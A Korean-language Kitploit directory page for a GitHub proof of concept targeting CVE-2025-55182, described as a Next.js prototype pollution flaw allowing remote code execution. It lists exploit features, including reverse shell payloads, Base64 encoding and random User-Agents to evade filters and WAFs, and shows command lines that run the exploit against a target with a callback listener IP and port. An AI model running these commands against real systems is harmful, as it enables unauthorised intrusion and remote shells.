Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/0xn7y/cve-2025-55182
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHub0xn7y/cve-2025-55182

CVE-2025-55182

CVE-2025-55182용 PoC

저장소 보기
9개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-55182 Next.js Prototype Pollution

CVE-2025-55182는 nextjs의 치명적인 프로토타입 폴루션(Prototype Pollution) 취약점으로, 프레임워크의 요청 처리 메커니즘에서 입력값을 제대로 검증하지 않아 RCE(원격 코드 실행)를 허용합니다. 이 모든 사태는 nextjs가 풋내기처럼 JSON 객체를 무턱대고 신뢰하기 때문에 벌어집니다.

POC

root@kitploit:~
1) 요청 파싱에서의 프로토타입 폴루션: nextjs는 프로토타입 체인을 오염시킬 수 있는 객체를 제대로 검증하지 않습니다.

2) 안전하지 않은 역직렬화: 프레임워크가 JSON 객체로 기본 객체 프로토타입을 수정하도록 허용합니다.

3) 프로토타입 체인 오염을 통한 child_process 기반 RCE: 프로토타입이 오염되면 로직을 가로채 서버가 임의의 코드를 실행하도록 만들 수 있습니다.

설치

root@kitploit:~
npm create [email protected] vuln

Exploit 핵심 기능

root@kitploit:~
1) 리버스 셸 페이로드: Linux/Win  리버스 셸
2) 필터를 몰래 우회하기 위한 Base64 인코딩
3) 자동 OS 감지
4) WAF를 회피하기 위한 랜덤 User-Agent
5) 실패 시 지수 백오프(Exponential Backoff)로 재시도하는 재시도 루프
6) 안정성을 위한 동시 공격 시도의 멀티스레딩

Base64 인코딩 사용 (우회)

root@kitploit:~
python exp_v2.py target 192.168.1.69 9001 --base64

재시도가 포함된 공격 모드

root@kitploit:~
python exploit.py target 192.168.1.69 9001 --retries 5 --threads 3

랜덤 User-Agent 비활성화

root@kitploit:~
python exploit.py target.com 192.168.1.69 9001 --no-spoof
도구 다운로드